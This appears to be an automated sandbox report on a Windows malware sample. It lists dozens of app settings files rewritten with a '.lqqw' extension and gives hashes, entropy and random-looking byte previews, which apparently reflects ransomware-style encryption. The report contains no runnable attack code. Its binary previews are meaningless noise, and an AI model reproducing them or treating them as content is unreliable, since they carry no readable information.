                                                                                                                                                                                                    MD5:3302919B572458CBBB9DD94817D92DA7
                                                                                                                                                                                                    SHA1:34750A653AD9060C2E3CBC442FFD76F5C50EE725
                                                                                                                                                                                                    SHA-256:204F21EA4292CE9F6E7A9164BA7970F85C2AAE49E20F8E7FC128DE1B85FB38A6
                                                                                                                                                                                                    SHA-512:C61B59D978166B1C7C3AF7BA2815562A3FE6CE7B7065A69B0DAA30FFE6BA8CCC54F30125D4EEAF338D0DB14C3FE5F5B73E63B407DC7426D6155F4457DA5F4783
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: y....+..Fe...V%r7...C..-.F..R..Q.4....p...U...!........&../"...t..)`4H.~"6.).u.h..\.I..kP^....C..5..}..1-.3..B..S...;8...9/+.(..R..>'[V...c....qN.X.&.....q'y:._.n...@Z...pe...y.d..Mf.z.S..N..@$.k...............S.D..l..U[c...._.....*.....+..L..oVI=.....t....:....l......t.....\.4......|...3h....9....k.".e.V..]..w...&.8...]E...((......7P1.l......oh......>H."8.w..S...R..Bm%.r...o..Z...Xo.......!..r.l.._^.|...a..mCH+...y.s....7.........`...En..;...M...h..m....4.S.@..-.:1....K.".......W.S2z=q...}...9..*.|...yucE......!.".4.R.n..8/.......<.W}..X.1.p..O.xe.....y.?#.".'.7.*<..P.. f<.A.E.Ir..@.N.lN.i[..A.B...a.$....\...R...P..l..=P.|N.Ax.U....~1<.z...{<.*S.P...i....gs...z.E"n.5w...N....b....J.8....W....."}.D.*.....F...x..49!.....(U...c..sD.r.y3.......hHd!..M%.9p?#....#...J(....].WX_.+`..JL._.j#u..g..OZ.)...)W./.(..........7.g].i......k......3.5.L....:....q.-l..H<.U~..."...1(e.X6......q....(...$Bf.UEe..C.c.o......8."..".H.48.n..x.....Q?..P|..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):46901
                                                                                                                                                                                                    Entropy (8bit):7.99560052451221
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:Kw2uPEa52GdJiQdiOwupzKYPtAWfuF2hRuzodBic8SplVSHFNY9WW39HDF:32uPl3ndlwW9A4uACQ8aVSHFCAW39h
                                                                                                                                                                                                    MD5:82FF5156BC29671F49EFB4A21DA25962
                                                                                                                                                                                                    SHA1:D6BE7FA219B7A8863F5B01C4DDEA843E84C36D41
                                                                                                                                                                                                    SHA-256:A9FB91F43F6324DA56CB527B5AF9D3A446391ACA6D17EF8599DAF14C18118A46
                                                                                                                                                                                                    SHA-512:47D56CA835128BFC9908B436B75107E6FAF91EFE6EBBA71FAF1DDBBBDCD87AF869271C09335AACAE39F81D7BA3D00829F828A1577BBDC38D1864F047A44FDE93
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Ns8.;....a.x.....N....j....8.H.,.cN.3.....}.*..}.7D...hy........*.c..Z\....m...L..2N.....vpX...:..0...<S...k..M.L...@[.....o!.XQ7.TMt%.E.R...I..S..\\.".E...%/...........R....d...(...3.AA.m.]..H[..cM.._']]....0.{|.....Ii4....L(1.;.^.'..x.~G..1..AF.....p.....R...w...b.1(]m..tF......Z..Q..j...r.+.%.W./.-.....v.y.......+n....*h..<3....U..-.d..&+5N%]_..b.,s3.9.MlY8..e...W../.19@.A...\..Y.....I.pk,4..X.e...>.."u....]a).y4M./8..D...V.......[.Y.E..s.5AQ....CJm.P..',..q.i#..T...D.).?.....Ii}0\...sm....^.#...[O.}9..m.8;.x.e.,......&..v....2......Q.(....1.z...?..}.".s..]C@...k....S.8...K.WNg}.]o{......V/..35oo..........CM..e...Ya'..g.{.:.Iw....Q...`........M.<...."I.](.Q.s......S.0..(>.[..;..~C.j...V.d.[1...(..J...<........U..Z.g.....|.S<~}..jF.l.v...n..H4....u.uHi.f/-S..Tk%P..Q..r..H..3;..]k.q..0..*...HY..U.K...f.Q~8. .t..r.W..........&)....3S..B.I."..t...J<L.o,.e.6o.w.^..N..<H82.P.:...1.?.-..LR.'F>..p$U.......,....T....&...'...5.=..~.....sj.efI".
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9790733146531725
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:ULYdWca4XnK9gsCkrPDla/2dkiN7+/X411WIuN5sON8+U33LkX:pdWsXtoH82kMqKnuTsOO+U33Y
                                                                                                                                                                                                    MD5:750BFA96439559725471AF20B10B1971
                                                                                                                                                                                                    SHA1:44374EE68494105D14430CB644ACE493AB48AC47
                                                                                                                                                                                                    SHA-256:2D2808C5CD1A8DBDD46472384FC86F4AB9A581E039574274F72DB3A54228CF33
                                                                                                                                                                                                    SHA-512:EFAAD29E251E6332CD6DF337193D6362EB1CD6E91831CD8266DA724B976235C48EC9342AC67D45E1BF0C6E8490EA62424DACF2D0573660A5BCD488B9B8C538E3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f.X.Y..._h.Zl..+:.]P=..fo'.c.Vg=.dV..)....G....]....z...b...S....l....3%.p..s=4.y...D....R]....z..;.T.*^.0....Y.W.....a.9.}d9...~).i,XC...k..:..&...B.&.S...j4.]......s.09....Jd.! 2..N....fRn.rZeY.Xy.:F...qEo}.E...@J....G$@...s~......d-|.'....<......{fj.y........_]./..G..2uN.....2..Z..O...........v.<O.,W.3....\..v.f..j.WK....2.CU.g(2.-X.B>....b<m.(.3V...6S.H.J.....Gp....h.....3....Rc..u....O...*oq..H.T}......GhR..f ........17.J., .a..A_.(.h.)....t.q....'K.67J[.."l[.}.\..2.OV?..G..%-.ol).b..:.+)...a.(.[.H..c...jV^..r..#.a.l...t7iS*\....'....A.U(V..H...jO7B@..hr.../.p%...a0..x.1Q..I.T.,...v.C-L_..eQs.M......j,.9m.....(....3.=.B.@.\......y.f3..k....z....e....60.(..6..s...XO......`.f.....S"...du"._..^48Qw.O....S........2%.+...M....a.....O,v.qs.".l.}..E.)Cn.@..<@u...HF....R...&......s."<.(.{...@..#3.....%...M.9&.=...`.ku<.S..!.f...[pa.xe.q.Q.*z.a.p\R.....O..-......Q.Av.....v\..y.WE.w.~...L8..?.../..K2%r..rCn.y.p..)...<.T%S..r@..e...c..|k..6...4
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9762773940904985
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:78HkRtnsNKJq5Bs1HTGrAL0kSX0kw3cxgrBwmRAj:7CkLsNBcHCrJkMurZe
                                                                                                                                                                                                    MD5:08923ADB171B1DFB89E4F11844A7ACA4
                                                                                                                                                                                                    SHA1:C6DB34501E3D020F50E307D8A6EB8DF5554C99F9
                                                                                                                                                                                                    SHA-256:0851613667AD36490B17B0DE1DE27F38087AADA46F9C572D08CF708B012026AC
                                                                                                                                                                                                    SHA-512:A82C6981E079C88745B15F4592D9FD6F338932CA7292C90C79B224D3459A304047678E55C412FDF593FC9EAF7D4CF78984ACB52C59AA865A0BA5152893212865
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: J&+N....=.'.e....C..v3.kV.HJ..^...tc..x5..q.1Q<.....&d...\.c.3..#..wJ..G.M)I.x....7..g.P.%.46...s'i.....P:........;.........$".G...b..........@....".M.......m.2..^d(..."~..(U...2.vz....."..0."|`.sK....+.K.B<@.X..e|).8$...uh.|.A!...q.p.I.;.g..^V.b=s....e.-r.j..r..[T.......$....F........)}..3.@.."..w..;\Pu...\.].B.d.]...d..........W.D........A..I=n!'.c....;=.....=.6.s.;.v4.+U..Q..9.b..I4..^gc.?.8.F....Y......8<.H...,......us2..}..e.f.x..+..v{.q80(.P...[..8....3....".......t.IS^.s........z1Cy..j.b9....h.0..~i..M........?8.\..?aRkAT....R.qp;'=.H7..i.E....p2Y#...3..6...RL=..5..f.&..ctA...Wn....._<.q.]hm...=Su..d..9...l.%.Q......RPf.....C.\...."b.H..n..7X;...]q. ^..8........s.d.'*g+.....v.,.....E..T.......^...]+..Z..-b..r..z..^D|T...!.6...7..R.&0U|.ofP......\.v..'"{Zy.F...q.J>'...l..5....N.Zp.....V...<...i...c...8z ...R)..ek`F..]........c@.....V}s....!...Z...V..E..4...^k...E....r.y0...................\d.`.....]..[..z.fvE8.C./r.P....<7..0....u-.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9749242592067935
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:PizVICIzwcaWJvZTlEJy6mzqjGQxxCR2zcLB8s0JSKyPjd3ZDTj0Jk567:qzaCOVfEJzXjGCCkcdYJSzPjd3VTjy+M
                                                                                                                                                                                                    MD5:875967E1B791160E82238BB5FDB1016D
                                                                                                                                                                                                    SHA1:38458855D24E7F762840F491C8C4CDE4D32E4781
                                                                                                                                                                                                    SHA-256:89887A003D1AAAB8C888C887B43907125D2E01594A06706F594A66D4C325C73A
                                                                                                                                                                                                    SHA-512:E5393864F6299CED7128ED9A2384142C4015E02395D6C6F26A46A83A11C976991AC0B8B9616D2598C8D647BBE8671DC833E5B942DF0DDCBD3D45D99B978209BD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x.41p7i..A..4.a...'.....2R.P>C..V...&..."..%<%x.t..N?U....~.=.Z.@.x..gO.......u..n.3.-..6..1U...(}.<..~.l......Y.?./..J~....^p|.7.....C..#.....$....X.1.."...uoT.Y9 .T.p.}.eA..R..f.V.).Gn.......T/......}v4.Y.......)K.t .;...>...Rr..Y.o.$..O.M&.#....:....f.L.......jhL:=...PM.&m.J....B..G.\..;..r.W.#.e._.Q..;z...&^.wh.'r.......[..\......-pMp....?.`Q]P..2~...-.O.|\.&D....<.eN.XZH.s.2.kS.m..j:...o...>....u.:.k.............p..pw.J...^y5V.L4..!.....5|...M.!..T...M./.=;vX....V.D.f.1,J.?......0I$.(.....#sts.Z.L..P5.H..f...z@.<....$.q\..f..:U.#.SEJ.O........G3..{TU ..f....p.3..(.^."..aG.p@b.FU& ....z....0Qb....)......2i..o......g....e}..G?.......T.$..H.....l55.].L..}D.^....SW?.)....v\|..I..%`.K.Zb......A.~T.3..P0.$...P...FD.@K...S.,....$...V...7.:....6b|J.c..&P.yEZ...|....s.c....Bid..wv...(."...tY0#.g.!~l.l...2.I.-H5...I.,...uRp..|V........t.:.GY.<../.........T..=... L../..........8.vWd.!.@.&.@~}..9."H..o.jq..:....0..'#.^.....%..|N.......b`v.........W ?..t
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975893885280028
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:B4XFqt+8uwMudRzU7Vu21xZXn2Hd5X70+9VOaUrBK:iFqtqwMl7Vf3RnYN70+j0E
                                                                                                                                                                                                    MD5:C3791276A4221D353922785150798ED3
                                                                                                                                                                                                    SHA1:AEBE0D27F781CDD593907F164B81A29C9740F599
                                                                                                                                                                                                    SHA-256:E3D99631D0D77F29A3C4EB93D5D373C10695DEE00CB2D6BAC030DD5A7E9054BD
                                                                                                                                                                                                    SHA-512:8E2C7741BC1F68C1655A3C43B3E2E20F0E002C5E2821481E6965D1281C288296498D24DF1B0EB9A96017336AADEC265CA6C47D23F4A257F057C4D1536F36E132
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .?.w jw...f...X........t.LXCf*m.}.....r..I..q.s...4..2..p.....F..7.....Q..L.!.x[P..G..Tu)....... .|...%4z|8..8...0..Cs..*.M.Q.9Yj.gZ.V..TB.........@.`=.pN...e.f.x..u..U..bx...._..S.&....?n.b.e.7.c3AD..w]?J....DA....\U.{..Yv.]..L...E.^$02G.B...ChA..Q]i.P..*.6......B.%*.9.H.jeC8.].~....Og}....z.)._.Z.[!..K..x..|.d....Wn........y.....,....L.>..|Bh.P.I...%.........J<.I.....:.7[...N.~R.......CS>.....9dT.?..[..O..m....|.>.z...(.s...s..?n..T..y'X[T=.....n...$.........j.|.E..MY...0R]2....p.s,<&..CR..o..S&..x.k.e.H:o z.-.\.k.C.v^..l..w.~.B.....f.....0..}.z..h|....n.Ts.......T.jk.~.v.31.-._H\s..X.....^.?..............W..MBs...m\g=.j..>...#.G.$.....x7....H.].....lG.XV..|ah:....`.....@...1..6K!.........z.v.K[.6..z...8u...2....w.@...v6.A.;...7......Z...ua.W.~.&..d.G...H.:#.s.....u.=...C.....,.y..p...!.6o.h..X....w.LN..ND..|..N'.m..i5J.m.....3..K.k.eg....l.. {]..o...iJ.EE..C./..V......(...#...W-...U..JxN....P.........N.&%.....*..u.m..tg.FoS,..S
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980524658315609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:y2SSsrJYRWjhThUYnVVh2Z5oFfZr23U0zQ85Ykyvv4Vyur:vSlGYjxhzVIrOkyvgUur
                                                                                                                                                                                                    MD5:72A02EB8DF8FF207884AC28DD3FD61AC
                                                                                                                                                                                                    SHA1:357CFB9475FB124CBC2CA61FC35E1A2E7A1F996D
                                                                                                                                                                                                    SHA-256:62B09E4FD0CCFA8A4D88D9A5CBC0F84FE9BC109AC9138F0B74DBCCEA86771CC6
                                                                                                                                                                                                    SHA-512:324B7FAAFBAB48950EEA5DCBEB9A18525D3B34CFC51BD5BA7920FEECF643987B7E4F6ECC98E2C8CC595FD897FEE092759C4EB5F32C08488118C34967CABD5730
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..BD.....|.e&.y.J..W.....s/.QSV..{.R...7.....W...yC..,v.z..j.t..O.9...[..a.g.!..<.IY.....e...k[!<D.....n..L5[..gP....`.L&@..W...(........t....g|........R.u..G...W.........H...<..\2a...4...S....V.&..U.. [..H.e*.....=D.Ry..H...,..9.....A1h|.>2..g@.z\M$..p.F.W...]...Q.A..c...+.9..R.*.............y&...N.......v..}]....}.l.....;..p.....?.Q.......(AT0......W...%...S&...y9Y.\..34._...4...,.f3..._.E..;.,).d..."..)T1,.t~h.......!M;..d\F3...e.~)...;..[.........Q....(".!.i..'N.)..(/R.U-H.......:dK.r(...-.F.x.d.....&.;. R.J.<..0.I....X....E.2..I>2..Bi.0.,....5t......'.V(..o..LS#.2r.Z....5......!.\.......P+.._..1..x.."R..9.J...&~../()...-#b.~..<...U.7._.m.qq...d.8Z..I.....]....A.T....hQ....d1..8._.6.QWVL..7lZ02..\..O>..c ..?4.3Q..OX...w...<X.T.zC.j...,.vz..!.......z.z.=.A.X.8.-d....x....jV...J..[SVZ. ..a..].81q......BW.....Dk..i.....9....j...F......]..K...w4...m}........yN]l.@...T?..v'p4..UWQ......5..N.[A...rr..T..+k.g..5...._.gaF.}..7wf."bP....-.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97836714964917
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dXxgaEnXEQoDXeKZxOPGTkxQvJYGlYlwg/Lzv7CG7qw4a:dXxghNoDTZiG4xsLlepfOg4a
                                                                                                                                                                                                    MD5:C86F16CDD32225029F568D5F1CE901A5
                                                                                                                                                                                                    SHA1:D89B26BFD9BBE323B4C2A0D2FA0F9841AE392573
                                                                                                                                                                                                    SHA-256:B974E37AAAF0C23FE6E2F051A5A0139C15C2A4EC2F938698D86454E8B5F42429
                                                                                                                                                                                                    SHA-512:AFA2A7B1A29AB8FDAC9A716E1D741D89ED3D0DD6620FFBCB865EBD8C35DAD626D9757C67C2A86792121910432A6643865F30E60275367D75AB7FE4412D743745
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......I.&.....'..."U...Fi..,..RJ.U-.wj...e.@?...3..k....0m.~B.;./.W.........A.h.O......m....V8_@......{...d.......+...h\d.7. ....1.Xg}v.e.. ..Q.<...8=...Ir.^/...%.....B..T..iE~...d...23...%a.y..Y4(.j..S.....F..S.^..;.+m...+.\%....G)R.M..Wn...{T..l%U....1.y..,...z7._....D..v!....l.R..:.....b.,Z.].........|9S...o.V.I1._.4...(..)....EEFM;.#).....H..U.L..j....Q...Wa3....};bO6..l.i..[.J.9..u.(.&y5.i.8.g...I1.OH.":..2.x.A.3.kQ:Z7.q..."..s..)..I...fF..C0..,.Ru..9...%.:...e..J.M.(........+.K....R*..^Iy-.v ...@...b..../0.*...k.).).i#...O...Zgr.OY.S.g.Y.$....).A...v..Y.c......@7._....)./.(Yt....Jq.........I..@.0Rp.\....79.5...mQ.P.w.......C..H...i.QH......L.y@......c......#...Y:1K....W....I..~.....V"..|:..7.R...L$Y..mV...-..'.o.aZAX..mC....Di{..m.C.S.... ....e..9Xd...Q&5...!.V:8_(I..._e.T...\....j...^Fdy.b6$.......|....j..^~t.H.&..o_..mGV...9.6..d:8...TL.l3~..R...B...s.Q.Zvm;0.y/.>....M....c.....#..v......D..;.F...3AA.zq...&.CQ....(.~..r..p.5.z.{J%}>.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978145742798899
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wn6/tVzGJWCHzPANrN26Jj4vf4hfDJebaTwOgWTzlPl3:wn6lVGJWCTn65aYfgOTJ
                                                                                                                                                                                                    MD5:726C20F8F3E2D55507B0613BC48309D5
                                                                                                                                                                                                    SHA1:8A73FB6F060B149B0FA5C2B089483F979D806E3C
                                                                                                                                                                                                    SHA-256:D88E74BE661260AC968CFE42E5672A2BA3637F586045138B2B5686DFB864CB31
                                                                                                                                                                                                    SHA-512:731361B2EE27CC569E556F8612FF7CFC396DE773E756EEEBC5532783FBC3E2B9322E0AF01C68F01F09258FB2122C575DBA465AEAA5B9463E0B3FA94DEABF3798
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: M..6....{).."C":.wn.............)VX..Z.q!....1)#i...........IW....]....F....U.F...a......s......D.D....mep=.85....KF./.4_.b..n._.....G.!..:......$....}.$.=.F.b...#.Q..._..._..x.{.Tx..<.. ..u.M(.r.S..........i.b 6{]k*7.?tj..V.L...x..+g.,7J!.Us!.6.Cm&/.f...I._...f.=..$.}..W.:.c/e.q..[..c.&P..8W../Q.....U!).a.!n.$.,.TS..O.x5;.=.{U....#u...[...9..D.<.b{...s.....z.......4-..;5;..;PRK.6plCat...*.Cj......[.G...&...'....JP..y..<.]B.&.Y...O.W"..ASD...;.K.w......K..O.dd9`...OOh..&.8=@.1wWo.....i..z.e...Gi.....J..+5.*(!.].4.&#..W"...+.Qy.O..a....!.2`.y...[H.K..k...[.O..7...A.........ZZ..3h{..5.#....:S.}#.^...L.W;.s..b).0&...#,.'..T.R'.3<hu..|S....b;..p.{...P.`R..9k..I.1.......r...F.....R.s....N....xrs.h.L.A..O......B^.(VH.....0.....\..........e\.b}....]G..)...P.x.LH.......1wW0........U.[K...W_.}.i.Z_._........ ..a...e....uv.#....).*f...&......Nu..?......V..,l.z4.0d..~@.....*w..K...;.p}.P..l....P....}o...M.(..y.....!..'_\...$.;.....dm....%78.^!..EVLX.^.v...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978963976617365
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:j8/xhxJ3cOqNPauV21p1LuGq6QNJrwIb71A0Ab0B:j8J13/2P5k1rIHb7nAb0B
                                                                                                                                                                                                    MD5:999AA32EE276FD1B911FF866319A284B
                                                                                                                                                                                                    SHA1:BCE09DA9C6F21015AD02E84B3C3E1271678100F9
                                                                                                                                                                                                    SHA-256:585274580259E3B0B49811CF738AE3B0155F441C43C2230ECE9650074E650D85
                                                                                                                                                                                                    SHA-512:2359E8D2AAA94D8CB7B8531A696338FC7396C7B86C97456E29D032F90DBBF11D243E8C0F7640E415471C7AA6C7144BD2BEE865A4A265EE5F728C6330182B868F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .bOf....&].J*%2.f:.[r.J.o........?.........r..U.....i..nE.g.M.gf2...3..`.Q'v.0....t.3{K......K.....).!.y...QUc.5>.D4.....P....~.$.Z2.gT.-.+>Ia.r...)!..>.f...1.K.Q......C.7....... e.6.;u.S......@._.9.9...9Vt{...).x.@6..PZ{.']|f..g.%....wh..^..9...v...|]....y....2... .p.....x0y^..(.z...-..o_...s......\g....`......9...E...!1..E4......H.x...~.A.t....R..Q(.S"h<........a.o.x;..4...zy..x..p!..E.,.S...-4.^.;...{+-..v...:.=....,.g.4GpmW0.%.AM.L...nP..]w~.{%.O...RA..C.s..9I[..^.f..^|....pZ.B;.M$.wYR....ar..#..FWoxV...}...(V<....9.H.u?.\.Z1...W*.V.+.....06...g...o.V.J._.v..~.TR.:.j..t..P.p.F\..>f.w=.w*2:......1.A..M.w.+...E.k..wT*[.......!..k..+U`I.D4..=..-.YBK.w.`..i|4.........>.N.a.8.5..4cPw3.tD.....h...y.>J&.9....."..\..LC0>c..^.L.P[%...*.Os.Z...".B.=5....N,g....Y..0.........#.).(.R|.<..0d..... .=O.......z..\.#0..o.5..EN.sm..|AP.%a...'C.uC.....o..v.6..osl.\...ph4..~.s...R>U,...\.C..C.)-..%.-+6......u..2.5.Rax..6..)....yz....C..[.-...D.+...^o.a..F.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976452667726323
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:zOE8GkItcKrULuaTENiHY0Iu/I0s3BI0SRuwwU9ZiaEfjcrgXzB6twI5a:zjk4Vr1/iHY0Nzs3WNRuufOjcrgQwI5a
                                                                                                                                                                                                    MD5:4CD0E0150FDBF46F0A4F72693234D719
                                                                                                                                                                                                    SHA1:3E16D1AB945B2E3591A6505202639E679C6CFA44
                                                                                                                                                                                                    SHA-256:4C691D02FAA7FA2F0F37EFBE0FDDB5C0FB2116676D7430A57539021DA3C9C22C
                                                                                                                                                                                                    SHA-512:7006D8363DF320C35AAB6AE7D909EC6F3E04156CB65BAA9A972A723EE849A2D44044BFB3E81FDBAE163349131C34A56ADC2B4B7BAA7A0075A8D2C46F1ECD5A7D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .G-m...3.x....wSk..g...%.....IT....I..9.B......>..\!...E..N..#..:.*.S..K'9...J.....z.@}.H|._O.......:..4....P.......v.\1e.zl;...~..G.*.a...y_E./Z.0.cA=...:.Y0B..(...@,..%=.V.....F.eSG\.m...g>.X.&".d.T8?N?'.x..s^.K..... ....F7......w.3..0......Q.w.n~..I.~..L+...y..B.B+..wG...'<..."....4..J...7.....^.lO....X.<.d..QT...5.*V.a'&..-W.dZ. k<...k..[.~...]v...s04...z..r$...T.Dq.d);...rL.{G;./!..K....!.U.r(.."U......-..1.f...0.....1N%.).#..y..:.a!.h...`.....f.g..*.s..N,d...<.$.....\@.O...q`6...|.+.W.U#...`:..=....8B8......=..+.+.....0u.:...'[....W..J....r...e|.1..1O;.*\!....n.O=..|m.sLv..._...d....$Vw..,d>.B.Aj...{...P....r.."....\...H....g......,'.c...%}!..S...R....N<......D.$$U.....`.7u..m..7.{.up|.+5G......U.i.V.tc....mz..H.Z..P........@.c.`Eu......_]i....c.,...{+.iY/t.Rn+........~&....vK(}.F3.{qX.v...Y....h..}."K.,.3..a..Vu......g...T.......4F.2g.e.S..Lm..=|...|...Y..H..U.`P(.Iy)..#R.G}....E.M..y....7.XS..OJ#..+.).).#......x.l.qz..t.!.3
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978320030834734
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dJWpTJsyqYm/RzzKQ1M8HoGpHeZeOW0g/raQEW+d5:2fsyLKzl1M8HoWbOWZ/e3/
                                                                                                                                                                                                    MD5:6A898174171B6360ED8F7A9B82FFD852
                                                                                                                                                                                                    SHA1:894944FB927CC9306C24334B9C9F235D0BA03DC9
                                                                                                                                                                                                    SHA-256:700A9F3B1DC45550571476C8D1C2AD81B8A4BFB209EAE703470C2C558E0C580B
                                                                                                                                                                                                    SHA-512:869593AE2A11F238A156F5709F0DCC95391B12E417DC58005783C790D1CF576885A89D30D41FDE33D62D97287AEAE2598EF53D064FC18D3A8F9C109F678A13F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
